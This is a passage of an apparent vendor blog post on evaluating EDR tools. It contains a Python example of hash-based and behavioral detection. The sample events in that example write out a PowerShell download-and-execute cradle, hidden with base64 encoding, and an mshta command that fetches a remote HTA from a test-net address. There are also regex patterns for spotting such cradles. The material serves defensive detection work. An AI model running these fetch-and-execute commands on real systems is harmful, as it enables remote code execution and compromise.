3: How does the solution detect threats to your organization?
Understanding the types of threats an EDR security tool detects, as well as the technologies and techniques it uses to detect them, is often a central point of evaluation. Many solutions take a very narrow approach to detection and are at a disadvantage against solutions that provide broader coverage of threats.
Below are a few examples of criteria to understand when evaluating threat detection capabilities.
Types of threats detected:
- Malware (crimeware, ransomware, trojans, exploit kits, etc.)
- Misuse of legitimate applications (PowerShell, WMI, mshta.exe)
- File-based attacks (malicious Microsoft Office documents, Adobe PDF files, etc.)
- Unwanted software (browser toolbars, PUPs)
- Insider threats (malicious employee, compromised credentials, accidental release of data)
- Suspicious user activity
- Suspicious application behavior
Technologies and techniques used for detection:
- Behavioral analysis
- User behavior analytics
- Long tail analytics and anomaly detection
- Dynamic binary analysis (“sandboxing”)
- Static binary analysis
- Network threat intelligence (known bad domains, IP addresses)
- Binary threat intelligence (known bad file hashes such as MD5/SHA-1/SHA-256, file paths, code-signing data, YARA rules, etc.)
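The difference between narrow and broad coverage is easiest to see when two of the detection layers listed above are run side by side over the same process telemetry. The block below is an added example, not Red Canary's or any vendor's detection logic: the event schema, the "known bad" hash list and the behavioral rules are all constructed for illustration, the hash is a placeholder rather than a real malware hash, and the sample events (including the PowerShell download cradle, which is built and base64-encoded inline) are made up. A pure indicator match on file hashes catches only the sample it has seen before; the behavioral rules (an Office application spawning mshta.exe or PowerShell, an encoded command, a download cradle hidden inside the encoded command) catch the misuse of legitimate applications that has no known-bad hash at all.

```python
"""Layered detection over constructed process-creation events (illustrative, not a product's rules)."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Set


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    cmdline: str
    sha256: str


@dataclass
class Alert:
    host: str
    technique: str  # detection layer that fired: "binary_intel" or "behavioral"
    rule: str       # human-readable rule name
    image: str


# --- Layer 1: binary threat intelligence (indicator match) ----------------------------------
# Placeholder hash standing in for a previously analysed sample; constructed, not a real hash.
KNOWN_BAD_SHA256: Set[str] = {"0" * 63 + "1"}


def intel_match(ev: ProcessEvent) -> List[Alert]:
    if ev.sha256.lower() in KNOWN_BAD_SHA256:
        return [Alert(ev.host, "binary_intel", "known-bad SHA-256", ev.image)]
    return []


# --- Layer 2: behavioral analysis (how legitimate tools are being used) ---------------------
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"powershell.exe", "mshta.exe", "wmic.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (PowerShell accepts prefixes of the flag)
ENC_RE = re.compile(r"(?i)\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})")
CRADLE_RE = re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient)")
REMOTE_HTA_RE = re.compile(r"(?i)(https?://|javascript:|vbscript:)")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE script text; return it decoded, or None if malformed."""
    try:
        return base64.b64decode(b64).decode("utf-16le", errors="replace")
    except ValueError:
        return None


def behavioral_rules(ev: ProcessEvent) -> List[Alert]:
    alerts: List[Alert] = []
    parent, child, cmd = basename(ev.parent_image), basename(ev.image), ev.cmdline

    # Document-based attack: an Office process spawning a scripting host or other LOLBin
    if parent in OFFICE_APPS and child in LOLBINS:
        alerts.append(Alert(ev.host, "behavioral", f"{parent} spawned {child}", ev.image))

    if child == "powershell.exe":
        m = ENC_RE.search(cmd)
        decoded = decode_encoded_command(m.group(1)) if m else None
        if m:
            alerts.append(Alert(ev.host, "behavioral", "PowerShell encoded command", ev.image))
        # Look for the cradle in the raw command line and inside the decoded payload
        if CRADLE_RE.search(cmd) or (decoded and CRADLE_RE.search(decoded)):
            alerts.append(Alert(ev.host, "behavioral", "PowerShell download cradle", ev.image))

    if child == "mshta.exe" and REMOTE_HTA_RE.search(cmd):
        alerts.append(Alert(ev.host, "behavioral", "mshta executing remote or inline script", ev.image))
    return alerts


def detect(events: List[ProcessEvent]) -> List[Alert]:
    alerts: List[Alert] = []
    for ev in events:
        alerts.extend(intel_match(ev))
        alerts.extend(behavioral_rules(ev))
    return alerts


def missed_by_intel_only(events: List[ProcessEvent]) -> Set[str]:
    """Hosts the behavioral layer flags that a hash-only product would have stayed silent on."""
    intel_hosts = {a.host for ev in events for a in intel_match(ev)}
    behav_hosts = {a.host for ev in events for a in behavioral_rules(ev)}
    return behav_hosts - intel_hosts


# Constructed sample telemetry (hosts, paths and the 203.0.113.0/24 test-net address are made up).
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"
_ENC = base64.b64encode(_CRADLE.encode("utf-16le")).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Routine admin use of PowerShell: no alert expected from either layer
    ProcessEvent("ws01", r"C:\Windows\explorer.exe", _PS, "powershell.exe Get-Service", "a" * 64),
    # Word launching mshta against a remote HTA; hash unknown, so only behavior catches it
    ProcessEvent("ws02", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\mshta.exe", "mshta.exe http://203.0.113.10/update.hta", "b" * 64),
    # Excel launching an encoded PowerShell download cradle
    ProcessEvent("ws03", r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", _PS,
                 f"powershell.exe -nop -w hidden -enc {_ENC}", "c" * 64),
    # Previously seen sample with a benign-looking command line: only the intel layer fires
    ProcessEvent("ws04", r"C:\Windows\explorer.exe", r"C:\Users\j\Downloads\invoice.exe", "invoice.exe", "0" * 63 + "1"),
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a.host:5} {a.technique:13} {a.rule}")
    print("missed by hash matching alone:", sorted(missed_by_intel_only(SAMPLE_EVENTS)))
```

Run stand-alone, the hash layer flags only ws04 while the behavioral layer flags ws02 and ws03; ws01 stays quiet, which is the false-positive check worth repeating on real admin telemetry before trusting a rule like "Office spawned PowerShell" in production.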
The EDR Buyer’s Guide also includes specific scenarios to ask vendors about and helpful tips for gauging false positive rates, tuning, and understanding the benefits and drawbacks of broad versus narrow detection coverage.
Support for evaluating EDR security tools
Red Canary was built to support organizations struggling to manage the complexities of threat detection and response. We hope this guide helps you through your evaluation and purchase. If you have additional questions, we’re here to help. Contact us anytime with questions or to request a conversation to help guide you during your EDR evaluation.
Editor’s note: This blog post and the related EDR Buyer’s Guide were originally published in February 2017. Both resources have been updated based on changes in the EDR market and continuing evolution in the endpoint security space. We hope the information helps security teams navigate their evaluations.